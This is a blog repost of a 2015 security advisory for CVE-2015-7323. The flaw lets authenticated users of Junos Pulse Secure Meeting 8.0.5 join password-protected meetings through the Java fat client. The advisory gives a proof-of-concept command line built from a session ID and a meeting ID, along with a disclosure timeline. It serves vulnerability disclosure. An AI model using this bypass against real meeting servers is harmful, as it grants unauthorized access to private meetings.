Latest YouTube Video

Friday, September 25, 2015

[FD] CVE-2015-7323 - Secure Meeting (Pulse Collaboration) issue may allow authenticated users to bypass meeting authorization

Profundis Labs Security Advisory http://ift.tt/1NZyRbk Product: ================================ Junos Pulse Secure Meeting Secure Meeting is a part of the Junos Puls Collaboration software, which allows you to organize and holding virtual meetings with internal and external users via the Juniper Access Gateway. Vulnerability Type: =================== Insufficient Authorization Checks CVE Reference: ============== CVE-2015-7323 VENDOR Reference: ================= http://ift.tt/1PDlJ9l Vulnerability Details: ===================== It is possible to enter "secure" meetings without knowledge of the password and the invitation link using the java fat client (meetingAppSun.jar). To access such meetings the following information is required: - A valid sessionID (DSID). This sessionID can be obtained by either having an invitation link to any other meeting or the user has a valid account to log into junos pulse using the http login form. - The meeting ID The meeting ID is a 7-8 digits number which may be gained using brute force or via CVE-2015-7322 (http://ift.tt/1PDlJpA) Note: The vulnerability is only related to the java fat client. If a user tries to access a secure meeting using the web browser ( https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0), the meeting password (or invitation link) is required. PoC code(s): =============== Example how to start the java fat client to access a meeting A from the command line: java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type 0 Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url=" uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid "DSID=PARAM_C" PARAM_A = meeting ID of Meeting A PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server PARAM_C = a valid sessionID PARAM_D = the domain/IP of the Junos Pulse server Disclosure Timeline: ========================================================= Vendor Notification: 01/2015 Vendor Confirmation: 03/2015 Vendor Patch Release: 06/2015 Public Disclosure: 09/2015 Affected Version: ========================================================= 8.0.5 Exploitation Technique: ======================= Remote Severity Level: ========================================================= CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Source: Gmail -> IFTTT-> Blogger

No comments: